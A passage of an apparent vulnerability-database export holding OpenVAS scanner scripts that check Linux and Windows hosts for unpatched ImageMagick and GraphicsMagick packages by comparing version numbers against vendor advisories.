the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120688\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2016-10-26 15:38:07 +0300 (Wed, 26 Oct 2016)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2016-699)\");\n script_tag(name:\"insight\", value:\"Multiple flaws were found in ImageMagick. Please see the references for more information.\");\n script_tag(name:\"solution\", value:\"Run yum update ImageMagick to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2016-699.html\");\n script_cve_id(\"CVE-2016-3718\", \"CVE-2016-3717\", \"CVE-2016-3716\", \"CVE-2016-3715\", \"CVE-2016-3714\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-doc\", rpm:\"ImageMagick-doc~6.7.8.9~13.19.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-perl\", rpm:\"ImageMagick-perl~6.7.8.9~13.19.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-c++\", rpm:\"ImageMagick-c++~6.7.8.9~13.19.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick\", rpm:\"ImageMagick~6.7.8.9~13.19.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-debuginfo\", rpm:\"ImageMagick-debuginfo~6.7.8.9~13.19.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-devel\", rpm:\"ImageMagick-devel~6.7.8.9~13.19.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-c++-devel\", rpm:\"ImageMagick-c++-devel~6.7.8.9~13.19.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:35:18", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-05-08T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for ImageMagick (openSUSE-SU-2016:1261-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310851304", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851304", "sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851304\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-05-08 05:19:07 +0200 (Sun, 08 May 2016)\");\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\",\n \"CVE-2016-3718\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for ImageMagick (openSUSE-SU-2016:1261-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'ImageMagick'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for ImageMagick fixes the following issues:\n\n The update disables various insecure coders [boo#978061] These fix issues\n tracked in CVE-2016-3714, CVE-2016-3715, CVE-2016-3716, CVE-2016-3717,\n CVE-2016-3718\");\n\n script_tag(name:\"affected\", value:\"ImageMagick on openSUSE 13.2\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2016:1261-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSE13\\.2\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE13.2\")\n{\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick\", rpm:\"ImageMagick~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-debuginfo\", rpm:\"ImageMagick-debuginfo~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-debugsource\", rpm:\"ImageMagick-debugsource~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-devel\", rpm:\"ImageMagick-devel~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-extra\", rpm:\"ImageMagick-extra~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-extra-debuginfo\", rpm:\"ImageMagick-extra-debuginfo~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagick++-6_Q16-5\", rpm:\"libMagick++-6_Q16-5~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagick++-6_Q16-5-debuginfo\", rpm:\"libMagick++-6_Q16-5-debuginfo~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagick++-devel\", rpm:\"libMagick++-devel~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickCore-6_Q16-2\", rpm:\"libMagickCore-6_Q16-2~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickCore-6_Q16-2-debuginfo\", rpm:\"libMagickCore-6_Q16-2-debuginfo~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickWand-6_Q16-2\", rpm:\"libMagickWand-6_Q16-2~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickWand-6_Q16-2-debuginfo\", rpm:\"libMagickWand-6_Q16-2-debuginfo~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-PerlMagick\", rpm:\"perl-PerlMagick~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-PerlMagick-debuginfo\", rpm:\"perl-PerlMagick-debuginfo~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-doc\", rpm:\"ImageMagick-doc~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-devel-32bit\", rpm:\"ImageMagick-devel-32bit~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagick++-6_Q16-5-32bit\", rpm:\"libMagick++-6_Q16-5-32bit~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagick++-6_Q16-5-debuginfo-32bit\", rpm:\"libMagick++-6_Q16-5-debuginfo-32bit~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagick++-devel-32bit\", rpm:\"libMagick++-devel-32bit~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickCore-6_Q16-2-32bit\", rpm:\"libMagickCore-6_Q16-2-32bit~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickCore-6_Q16-2-debuginfo-32bit\", rpm:\"libMagickCore-6_Q16-2-debuginfo-32bit~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickWand-6_Q16-2-32bit\", rpm:\"libMagickWand-6_Q16-2-32bit~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickWand-6_Q16-2-debuginfo-32bit\", rpm:\"libMagickWand-6_Q16-2-debuginfo-32bit~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:03", "description": "Nikolay Ermishkin from the Mail.Ru Security\nTeam and Stewie discovered several vulnerabilities in ImageMagick, a program suite for\nimage manipulation. These vulnerabilities, collectively known as ImageTragick,\nare the consequence of lack of sanitization of untrusted input. An\nattacker with control on the image input could, with the privileges of\nthe user running the application, execute code\n(CVE-2016-3714), make HTTP\nGET or FTP requests (CVE-2016-3718),\nor delete (CVE-2016-3715), move\n(CVE-2016-3716), or read\n(CVE-2016-3717\n) local files.\n\nThese vulnerabilities are particularly critical if Imagemagick processes\nimages coming from remote parties, such as part of a web service.\n\nThe update disables the vulnerable coders (EPHEMERAL, URL, MVG, MSL, and\nPLT) and indirect reads via /etc/ImageMagick-6/policy.xml file. In\naddition, we introduce extra preventions, including some sanitization for\ninput filenames in http/https delegates, the full remotion of PLT/Gnuplot\ndecoder, and the need of explicit reference in the filename for the\ninsecure coders.", "cvss3": {}, "published": "2016-05-16T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3580-1 (imagemagick - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "modified": "2019-03-18T00:00:00", "id": "OPENVAS:1361412562310703580", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703580", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3580.nasl 14279 2019-03-18 14:48:34Z cfischer $\n# Auto-generated from advisory DSA 3580-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703580\");\n script_version(\"$Revision: 14279 $\");\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\",\n \"CVE-2016-3718\");\n script_name(\"Debian Security Advisory DSA 3580-1 (imagemagick - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:48:34 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-05-16 00:00:00 +0200 (Mon, 16 May 2016)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2016/dsa-3580.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n script_tag(name:\"affected\", value:\"imagemagick on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (jessie), these\nproblems have been fixed in version 8:6.8.9.9-5+deb8u2.\n\nWe recommend that you upgrade your imagemagick packages.\");\n script_tag(name:\"summary\", value:\"Nikolay Ermishkin from the Mail.Ru Security\nTeam and Stewie discovered several vulnerabilities in ImageMagick, a program suite for\nimage manipulation. These vulnerabilities, collectively known as ImageTragick,\nare the consequence of lack of sanitization of untrusted input. An\nattacker with control on the image input could, with the privileges of\nthe user running the application, execute code\n(CVE-2016-3714), make HTTP\nGET or FTP requests (CVE-2016-3718),\nor delete (CVE-2016-3715), move\n(CVE-2016-3716), or read\n(CVE-2016-3717\n) local files.\n\nThese vulnerabilities are particularly critical if Imagemagick processes\nimages coming from remote parties, such as part of a web service.\n\nThe update disables the vulnerable coders (EPHEMERAL, URL, MVG, MSL, and\nPLT) and indirect reads via /etc/ImageMagick-6/policy.xml file. In\naddition, we introduce extra preventions, including some sanitization for\ninput filenames in http/https delegates, the full remotion of PLT/Gnuplot\ndecoder, and the need of explicit reference in the filename for the\ninsecure coders.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software\nversion using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"imagemagick\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"imagemagick-6.q16\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"imagemagick-common\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"imagemagick-dbg:amd64\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"imagemagick-dbg:i386\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"imagemagick-doc\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libimage-magick-perl\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libimage-magick-q16-perl\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmagick++-6-headers\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmagick++-6.q16-5:amd64\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmagick++-6.q16-5:i386\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmagick++-6.q16-dev:amd64\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmagick++-6.q16-dev:i386\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmagick++-dev\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmagickcore-6-arch-config:amd64\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmagickcore-6-arch-config:i386\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmagickcore-6-headers\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmagickcore-6.q16-2:amd64\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmagickcore-6.q16-2:i386\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif((res = isdpkgvuln(pkg:\"libmagickcore-6.q16-2-extra:amd64\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmagickcore-6.q16-2-extra:i386\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif((res = isdpkgvuln(pkg:\"libmagickcore-6.q16-dev:amd64\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmagickcore-6.q16-dev:i386\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif((res = isdpkgvuln(pkg:\"libmagickcore-dev\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmagickwand-6-headers\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmagickwand-6.q16-2:amd64\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmagickwand-6.q16-2:i386\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif((res = isdpkgvuln(pkg:\"libmagickwand-6.q16-dev:amd64\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmagickwand-6.q16-dev:i386\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif((res = isdpkgvuln(pkg:\"libmagickwand-dev\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"perlmagick\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:26", "description": "This host is installed with GraphicsMagick\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2017-08-23T00:00:00", "type": "openvas", "title": "GraphicsMagick Multiple Vulnerabilities - Aug17 (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-13063", "CVE-2017-13148", "CVE-2017-13147", "CVE-2017-12936", "CVE-2017-13066", "CVE-2017-13065", "CVE-2017-11642", "CVE-2017-12937", "CVE-2017-12935", "CVE-2017-13064"], "modified": "2018-10-12T00:00:00", "id": "OPENVAS:1361412562310112027", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310112027", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_graphicsmagick_mult_vuln_aug17_win.nasl 11874 2018-10-12 11:28:04Z mmartin $\n#\n# GraphicsMagick Multiple Vulnerabilities - Aug17 (Windows)\n#\n# Authors:\n# Adrian Steins <adrian.steins@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:graphicsmagick:graphicsmagick\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.112027\");\n script_version(\"$Revision: 11874 $\");\n script_cve_id(\"CVE-2017-11642\", \"CVE-2017-12935\", \"CVE-2017-12936\", \"CVE-2017-12937\", \"CVE-2017-13063\", \"CVE-2017-13064\", \"CVE-2017-13065\", \"CVE-2017-13066\", \"CVE-2017-13147\", \"CVE-2017-13148\");\n script_tag(name:\"cvss_base\", value:\"7.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 13:28:04 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-08-23 11:38:13 +0200 (Wed, 23 Aug 2017)\");\n script_name(\"GraphicsMagick Multiple Vulnerabilities - Aug17 (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with GraphicsMagick\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"GraphicsMagick 1.3.26 and prior is prone to multiple vulnerabilities:\n\n - Allocation failure vulnerabilities.\n\n - Heap buffer overflow vulnerabilities.\n\n - Null pointer dereference vulnerabilities.\n\n - Memory leak vulnerabilities.\n\n - Invalid memory read vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to cause a denial of service via a crafted file.\");\n\n script_tag(name:\"affected\", value:\"GraphicsMagick version 1.3.26 and earlier on Windows\");\n\n script_tag(name:\"solution\", value:\"Updates are available, see the references for details.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_xref(name:\"URL\", value:\"https://sourceforge.net/p/graphicsmagick/bugs/434/\");\n script_xref(name:\"URL\", value:\"https://sourceforge.net/p/graphicsmagick/bugs/436/\");\n script_xref(name:\"URL\", value:\"https://sourceforge.net/p/graphicsmagick/bugs/435/\");\n script_xref(name:\"URL\", value:\"https://sourceforge.net/p/graphicsmagick/bugs/430/\");\n script_xref(name:\"URL\", value:\"https://sourceforge.net/p/graphicsmagick/bugs/446/\");\n script_xref(name:\"URL\", value:\"https://blogs.gentoo.org/ago/2017/08/05/graphicsmagick-invalid-memory-read-in-setimagecolorcallback-image-c/\");\n script_xref(name:\"URL\", value:\"https://blogs.gentoo.org/ago/2017/08/05/graphicsmagick-use-after-free-in-readwmfimage-wmf-c/\");\n script_xref(name:\"URL\", value:\"https://blogs.gentoo.org/ago/2017/08/05/graphicsmagick-heap-based-buffer-overflow-in-readsunimage-sun-c/\");\n\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"gb_graphicsmagick_detect_win.nasl\");\n script_mandatory_keys(\"GraphicsMagick/Win/Installed\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!gmVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less_equal(version:gmVer, test_version:\"1.3.26\"))\n{\n report = report_fixed_ver(installed_version:gmVer, fixed_version:\"See Vendor\");\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:35:20", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-06-03T00:00:00", "type": "openvas", "title": "Ubuntu Update for imagemagick USN-2990-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717", "CVE-2016-5118"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310842781", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842781", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for imagemagick USN-2990-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842781\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-06-03 05:28:40 +0200 (Fri, 03 Jun 2016)\");\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\",\n \t\t\"CVE-2016-3718\", \"CVE-2016-5118\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n 